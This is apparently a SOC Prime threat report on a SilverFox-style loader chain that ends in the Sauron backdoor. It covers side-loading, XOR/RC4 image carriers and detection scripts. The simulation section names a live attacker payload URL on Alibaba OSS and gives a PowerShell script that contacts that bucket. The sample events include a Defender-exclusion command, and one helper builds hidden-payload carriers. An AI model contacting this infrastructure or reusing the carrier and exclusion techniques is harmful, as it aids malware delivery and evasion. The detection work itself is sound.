SOC Prime Bias: High

24 Jun 2026 18:35 UTC

SilverFox-Style Loader Chain Uses Panasonic Shells, Alibaba OSS, and Sauron

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

This threat centers on a multi-stage loader chain disguised as legitimate Panasonic software. The loader fetches its payloads from Alibaba Cloud OSS and carries the encrypted stages inside image files that end in a distinctive five-byte EOF trailer. The final stage deploys the Sauron backdoor, which persists through service creation and targeted registry changes.

Investigation

Static and dynamic analysis uncovered a sequence of DLL side-loading operations involving host binaries branded as Tencent and Philips software. The investigation exposed a layered decryption routine combining incrementing XOR and RC4, along with scheduled task creation through direct RPC calls to the Task Scheduler service (\pipe\atsvc) rather than through schtasks.exe. Memory forensics and sandbox telemetry were used to reconstruct the full execution path, from the initial Panasonic-themed wrapper to the final Sauron backdoor.
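
The decode chain described above, as an added example that is neither SOC Prime's code nor the malware's own routine: a Python decoder for an image carrier that strips a five-byte EOF trailer, undoes an incrementing XOR layer, then RC4-decrypts. The trailer layout (4-byte little-endian payload length followed by a 1-byte XOR seed), the order of the two layers, the XOR schedule (byte i XORed with seed + i) and the key are all assumptions for illustration; the page does not document the real format. A matching embed function builds a test carrier so the decoder can be exercised offline.

```python
"""Decode an image carrier: five-byte EOF trailer -> incrementing XOR -> RC4.

Assumed layout (hypothetical; the page does not document the real format):
    carrier = <image bytes> || <ciphertext> || <trailer>
    trailer = payload_len (uint32, little-endian) || xor_seed (uint8)
"""
import struct

TRAILER_LEN = 5
TRAILER_FMT = "<IB"   # assumed: 4-byte LE payload length, 1-byte XOR seed


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    if not key:
        raise ValueError("RC4 key must be non-empty")
    s = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def incrementing_xor(data: bytes, seed: int) -> bytes:
    """XOR byte i with (seed + i) mod 256 (assumed schedule); symmetric, so it decodes too."""
    return bytes(b ^ ((seed + i) & 0xFF) for i, b in enumerate(data))


def parse_trailer(carrier: bytes) -> tuple:
    """Return (payload_len, xor_seed) from the last five bytes, checking that the
    length field actually fits inside the carrier."""
    if len(carrier) < TRAILER_LEN:
        raise ValueError("carrier shorter than the five-byte trailer")
    payload_len, seed = struct.unpack(TRAILER_FMT, carrier[-TRAILER_LEN:])
    if payload_len == 0 or payload_len + TRAILER_LEN > len(carrier):
        raise ValueError("trailer length field does not fit the carrier; no embedded payload")
    return payload_len, seed


def has_trailer(carrier: bytes) -> bool:
    """Cheap triage check: True when the last five bytes parse as a plausible trailer.
    A heuristic only; an ordinary image can pass by chance."""
    try:
        parse_trailer(carrier)
        return True
    except ValueError:
        return False


def extract_payload(carrier: bytes, rc4_key: bytes) -> bytes:
    """Locate the ciphertext via the trailer, undo the XOR layer, then RC4-decrypt."""
    payload_len, seed = parse_trailer(carrier)
    blob = carrier[-(TRAILER_LEN + payload_len):-TRAILER_LEN]
    return rc4(rc4_key, incrementing_xor(blob, seed))


def embed_payload(image: bytes, payload: bytes, rc4_key: bytes, seed: int) -> bytes:
    """Inverse of extract_payload (RC4 first, then XOR); used to build a test carrier."""
    blob = incrementing_xor(rc4(rc4_key, payload), seed)
    return image + blob + struct.pack(TRAILER_FMT, len(blob), seed)


if __name__ == "__main__":
    # Constructed carrier: a fake GIF header plus filler stands in for the real image.
    image = b"GIF89a" + bytes(range(40))
    stage = b"MZ\x90\x00 constructed second stage"
    carrier = embed_payload(image, stage, b"k3y", 0x7A)
    assert extract_payload(carrier, b"k3y") == stage
    print("payload length from trailer:", parse_trailer(carrier)[0])
```

When the real trailer differs, only TRAILER_FMT and the slice in extract_payload need to change; has_trailer is useful for sweeping a staging directory of .gif/.jpg/.png/.db files for candidates before spending time on full decryption.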

Mitigation

Organizations should monitor for scheduled tasks created over RPC from user-mode processes that call NdrClientCall3 directly rather than going through schtasks.exe or the Task Scheduler UI. Strong application allowlisting can block execution of unapproved side-loaded DLLs. Defenders should also watch for unexpected deletion of volume shadow copies, Windows Defender exclusions added with Add-MpPreference, and suspicious registry modifications under HKCU\SOFTWARE.
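
An added example, not SOC Prime's rule logic: a Python triage over constructed Sysmon-style events that applies the checks above. NdrClientCall3 is a function-level signal that endpoint telemetry does not expose directly, so the example uses the Sysmon named-pipe connect event (ID 18) to \atsvc from a process outside an assumed scheduler-client allowlist as its stand-in; the user-writable path patterns and the sample events are assumptions as well. Sysmon records per-user hives as HKU\<SID>\SOFTWARE rather than HKCU\SOFTWARE, so the registry check accepts both spellings.

```python
"""Triage constructed Sysmon-style events for the behaviours listed under Mitigation."""
import re
from dataclasses import dataclass

# Assumed allowlist of legitimate clients of the Task Scheduler RPC endpoint.
SCHEDULER_CLIENTS = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\schtasks.exe",
    r"c:\windows\system32\mmc.exe",
}
# Assumed "user-writable" locations a side-loaded host binary would run from (matched on lowercase paths).
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\|\\programdata\\|\\windows\\temp\\")
# Sysmon logs per-user hives as HKU\<SID>\...; accept HKCU too for normalised sources.
HKCU_SOFTWARE = re.compile(r"^(hkcu|hku\\s-1-5-21-[0-9-]+)\\software\\")
DEFENDER_EXCLUSION = re.compile(
    r"add-mppreference\b.*-exclusion(path|process|extension|ipaddress)", re.IGNORECASE)

# Constructed sample events; keys follow Sysmon EventData field names, values are made up.
SAMPLE_EVENTS = [
    {"EventID": 18, "Image": r"C:\Windows\System32\svchost.exe", "PipeName": r"\atsvc"},
    {"EventID": 18, "Image": r"C:\Users\alice\AppData\Local\Temp\UxEnhanceHost.exe", "PipeName": r"\atsvc"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ep bypass -c Add-MpPreference -ExclusionPath 'C:\ProgramData\upd'"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-MpPreference"},
    {"EventID": 13, "Image": r"C:\ProgramData\upd\UxEnhanceHost.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\SOFTWARE\Classes\svc\Run"},
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\app.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\SOFTWARE\Vendor\Settings"},
]


@dataclass
class Finding:
    rule: str
    image: str
    detail: str


def triage(events):
    """Return one Finding per event that trips one of the three checks."""
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        image = ev.get("Image", "")
        low_image = image.lower()
        if eid == 18 and ev.get("PipeName", "").lower() == r"\atsvc":
            # Pipe connect to the scheduler endpoint from something other than the usual clients.
            if low_image not in SCHEDULER_CLIENTS:
                findings.append(Finding("rpc_task_scheduling", image, ev["PipeName"]))
        elif eid == 1 and DEFENDER_EXCLUSION.search(ev.get("CommandLine", "")):
            findings.append(Finding("defender_exclusion_added", image, ev["CommandLine"]))
        elif eid == 13:
            target = ev.get("TargetObject", "")
            if HKCU_SOFTWARE.match(target.lower()) and USER_WRITABLE.search(low_image):
                findings.append(Finding("hkcu_software_write_from_user_path", image, target))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.rule:40} {f.image}  ->  {f.detail}")
```

Security event 4698 records every task creation but not the creating process, so pairing it by time with the pipe-connect finding is what attributes an RPC-created task to the side-loaded host binary. The registry check deliberately requires both conditions (per-user SOFTWARE hive and a user-writable image path); either alone is far too noisy on a real fleet.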

Response

If this activity is detected, isolate affected systems immediately to stop further lateral movement or command-and-control communication. Conduct memory forensics to identify the injected modules and determine the current stage of the loader chain. Network logs should also be reviewed for traffic to Alibaba OSS infrastructure and the known command-and-control IP addresses identified during triage.

Attack Flow

    graph TB
    %% Class definitions
    classDef action fill:#99ccff
    classDef malware fill:#ff9999
    classDef tool fill:#cccccc
    classDef evasion fill:#ccffcc
    classDef persistence fill:#ffff99

    %% Initial access and execution
    exec_user_malicious["<b>Action</b> - <b id='T1204.002'>User Execution: Malicious File</b><br/><b>File</b>: ainstaller-86533005.exe<br/><b>Description</b>: User executes trojanized executable<br/>disguised as Panasonic PC Notification software."]
    class exec_user_malicious action

    %% Obfuscation and masquerading
    obf_files["<b id='T1027'>Obfuscated Files or Information</b><br/><b>Technique</b>: Multi-layer staged buffers<br/><b>Mechanism</b>: Custom XOR/RC4 decoding<br/><b>Extraction</b>: Five-byte EOF trailer from image carriers."]
    class obf_files malware
    mask_file_type["<b id='T1036.008'>Masquerading: Masquerade File Type</b><br/><b>Description</b>: Using image extensions (gif, jpg, png, db)<br/>to hide encrypted payloads."]
    class mask_file_type evasion

    %% Proxy execution
    proxy_sys_bin["<b id='T1218'>System Binary Proxy Execution</b><br/><b>Target 1</b>: Tencent UxEnhanceHost loading UxEnhance64.dll<br/><b>Target 2</b>: Philips/Speech Processing Solutions host loading XPSPLOG.dll"]
    class proxy_sys_bin action

    %% Persistence
    persist_sched_task["<b id='T1053.005'>Scheduled Task/Job: Scheduled Task</b><br/><b>Module</b>: VirtuOne<br/><b>Mechanism</b>: RPC calls to Task Scheduler via \\pipe\atsvc<br/><b>Goal</b>: Create hidden repeating tasks."]
    class persist_sched_task persistence

    %% Defense evasion
    evade_def_impair["<b id='T1685'>Defense Impairment</b><br/><b>Action</b>: Patching ntdll.dll!NtTraceEvent"]
    class evade_def_impair evasion
    evade_selective_excl["<b id='T1679'>Selective Exclusion</b><br/><b>Tool</b>: PowerShell<br/><b>Command</b>: Add-MpPreference -ExclusionPath<br/><b>Goal</b>: Add Windows Defender exclusions."]
    class evade_selective_excl evasion

    %% Final stage
    proxy_rundll32["<b id='T1218.011'>System Binary Proxy Execution: Rundll32</b><br/><b>File</b>: rundll32.dat<br/><b>Export</b>: Edge<br/><b>Action</b>: Installs and starts malicious service."]
    class proxy_rundll32 action
    malware_sauron["<b id='Malware'>Malware: Sauron</b><br/><b>Type</b>: Malicious Service<br/><b>Capability</b>: Persistent backdoor and command-launching."]
    class malware_sauron malware

    %% Flow of execution
    exec_user_malicious -->|triggers| obf_files
    obf_files -->|utilizes| mask_file_type
    mask_file_type -->|leads_to| proxy_sys_bin
    proxy_sys_bin -->|enables| persist_sched_task
    persist_sched_task -->|facilitates| evade_def_impair
    persist_sched_task -->|facilitates| evade_selective_excl
    evade_def_impair -->|prepares environment for| proxy_rundll32
    evade_selective_excl -->|prepares environment for| proxy_rundll32
    proxy_rundll32 -->|installs| malware_sauron

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands: The adversary downloads a second-stage payload from a legitimate cloud storage service so the transfer blends into normal traffic. A PowerShell one-liner simulates the loader requesting the known SilverFox Alibaba OSS URL https://jun616.oss-cn-beijing.aliyuncs.com/tad/payload.exe. The request rides on the reputation of aliyuncs.com, which defeats simple domain filters, while the bucket and path (jun616 and /tad/) are the specific indicator the detection rule matches. The regression script below requests a benign object name under that same bucket and path prefix, so the proxy records the indicator without a real payload being fetched.

  • Regression Test Script:

    # Simulation of SilverFox Loader Network Indicator
    # Requests a benign object name under the bucket/path prefix monitored by the Sigma rule.
    # Only the HTTP request (host + path) matters for the proxy telemetry, not the response.
    
    $targetUrl = "https://jun616.oss-cn-beijing.aliyuncs.com/tad/test_file.txt"
    Write-Host "[!] Simulating SilverFox network connection to: $targetUrl"
    
    try {
        # Invoke-WebRequest generates standard HTTP proxy telemetry.
        # -UseBasicParsing keeps Windows PowerShell 5.1 from loading the IE DOM parser (a no-op on PowerShell 7);
        # -TimeoutSec keeps the test from hanging if the endpoint is sinkholed or blocked.
        $response = Invoke-WebRequest -Uri $targetUrl -Method Get -UseBasicParsing -TimeoutSec 15
        Write-Host "[+] Request completed. Status Code: $($response.StatusCode)"
    }
    catch {
        # A 404, 403 or connection error is expected if the object is not hosted;
        # the proxy log still records the attempt, which is all the rule needs.
        Write-Host "[-] Request attempted ($($_.Exception.Message)). Check proxy logs for the connection attempt."
    }
  • Cleanup Commands:

    # No persistent changes made by this simulation; no cleanup required.
    Write-Host "[*] Simulation cleanup complete."
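
An added example, not part of the SOC Prime page or its Sigma rule: a Python check that applies the same host-plus-path logic to proxy access logs, so the regression script's request can be confirmed in telemetry and the source hosts listed for the Response step. The log format (Squid-style access lines) and the entries themselves are constructed; the rule logic is assumed from the narrative above, namely host jun616.oss-cn-beijing.aliyuncs.com and a path beginning /tad/. A request to a different bucket on the same aliyuncs.com domain is included to show that domain reputation alone is not what the rule keys on.

```python
"""Apply the SilverFox OSS network indicator to proxy access logs."""
from urllib.parse import urlsplit

# Indicator assumed from the narrative: bucket host plus object path prefix.
INDICATOR_HOST = "jun616.oss-cn-beijing.aliyuncs.com"
INDICATOR_PATH_PREFIX = "/tad/"

# Constructed Squid-style access lines: timestamp client status/code bytes method url
SAMPLE_PROXY_LOG = """\
1782671700.123 10.0.0.5 TCP_MISS/200 4096 GET https://jun616.oss-cn-beijing.aliyuncs.com/tad/test_file.txt
1782671701.456 10.0.0.5 TCP_MISS/404 512 GET https://jun616.oss-cn-beijing.aliyuncs.com/tad/payload.exe
1782671702.789 10.0.0.7 TCP_MISS/200 2048 GET https://docs.oss-cn-beijing.aliyuncs.com/tad/readme.txt
1782671703.000 10.0.0.9 TCP_MISS/200 1024 GET https://jun616.oss-cn-beijing.aliyuncs.com/static/logo.png
1782671704.000 10.0.0.5 TCP_MISS/200 8192 GET https://JUN616.OSS-CN-BEIJING.ALIYUNCS.COM/tad/x.gif
garbage line that does not parse
"""


def parse_line(line: str):
    """Return a dict for a well-formed access line, None otherwise."""
    parts = line.split()
    if len(parts) < 6:
        return None
    try:
        ts = float(parts[0])
    except ValueError:
        return None
    return {"ts": ts, "client": parts[1], "status": parts[2], "method": parts[4], "url": parts[5]}


def matches_indicator(url: str) -> bool:
    """Host match is case-insensitive (DNS); the path stays case-sensitive because OSS object keys are."""
    u = urlsplit(url)
    host = (u.hostname or "").lower()
    return host == INDICATOR_HOST and u.path.startswith(INDICATOR_PATH_PREFIX)


def scan(log_text: str):
    """All parsed records whose URL matches the indicator, regardless of HTTP status."""
    return [rec for rec in map(parse_line, log_text.splitlines())
            if rec and matches_indicator(rec["url"])]


def clients_to_isolate(hits) -> list:
    """Distinct source IPs that requested the indicator, for the Response step."""
    return sorted({h["client"] for h in hits})


if __name__ == "__main__":
    hits = scan(SAMPLE_PROXY_LOG)
    for h in hits:
        print(f"{h['client']:12} {h['status']:14} {h['url']}")
    print("isolate:", clients_to_isolate(hits))
```

The 404 line is still a hit: the rule fires on the request, not on a successful download, which is exactly why the regression script does not need the object to exist. Matching on the parsed host and path rather than a substring of the raw URL also avoids false negatives from mixed-case hostnames and false positives from the indicator appearing in a query string or referer.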